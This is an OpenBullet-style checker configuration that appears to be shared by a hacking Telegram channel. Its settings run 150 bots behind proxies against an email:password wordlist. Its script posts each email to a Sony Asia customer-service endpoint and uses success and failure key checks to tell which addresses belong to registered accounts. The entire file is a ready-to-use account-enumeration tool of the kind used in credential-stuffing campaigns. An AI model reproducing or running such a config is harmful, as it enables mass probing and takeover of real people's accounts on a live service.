[SETTINGS]
{
  "Name": "PSN VM 100% WORKING",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2022-01-31T14:08:01.0372796+04:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "https://t.me/ihaxfrance",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://mysonyvm.sony-asia.com/Hsl.Sony.Crm.WCFServiceApp/InteractServices.svc/RetrieveUserFromAzureAJAX" 
  CONTENT "{\"email\" : \"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"d\":\"[\\\"\\\",\\\"\\\"]\"}" 
  KEYCHAIN Success OR 
    KEY "\"True" 

FUNCTION Constant "https://t.me/ihaxfrance" -> CAP "Config By" 

